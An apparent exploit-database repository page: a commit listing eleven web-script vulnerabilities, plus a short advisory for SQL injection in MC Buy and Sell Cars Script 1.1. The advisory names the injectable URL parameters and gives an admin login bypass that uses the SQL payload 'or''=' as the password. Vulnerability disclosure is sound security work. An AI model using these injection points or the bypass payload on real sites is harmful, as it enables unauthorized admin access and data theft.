b086c09178
11 new exploits 9 Network Linkedin Clone Script - Improper Access Restrictions Article Directory Script Seo 3.2 - Improper Access Restrictions e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass MC Smart Shop Script - SQL Injection MC Buy and Sell Cars Script 1.1 - SQL Injection MC Yellow Pages Script - SQL Injection MC Real Estate Pro Script - Improper Access Restrictions MC Hosting Coupons Script - Cross-Site Request Forgery MC Inventory Manager Script - Multiple Vulnerabilities MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions MC Documentation Creator Script - SQL Injection
20 lines
821 B
Text
Executable file
20 lines
821 B
Text
Executable file
# # # # #
|
|
# Vulnerability: SQL Injection Web Vulnerability
|
|
# Date: 15.01.2017
|
|
# Vendor Homepage: http://microcode.ws/
|
|
# Script Name: MC Buy and Sell Cars Script
|
|
# Script Version: V1.1
|
|
# Script Buy Now: http://microcode.ws/product/mc-buy-and-sell-cars-php-script/3878
|
|
# Author: İhsan Şencan
|
|
# Author Web: http://ihsan.net
|
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/car.php?c=[SQL]
|
|
# http://localhost/[PATH]/car.php?c=[Permalink]&id=[SQL]
|
|
# http://localhost/[PATH]/cateogry.php?p=search&cage=all&manufacturer=[SQL]
|
|
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
|
|
#
|
|
# Admin Login Bypass
|
|
# http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter.
|
|
# # # # #
|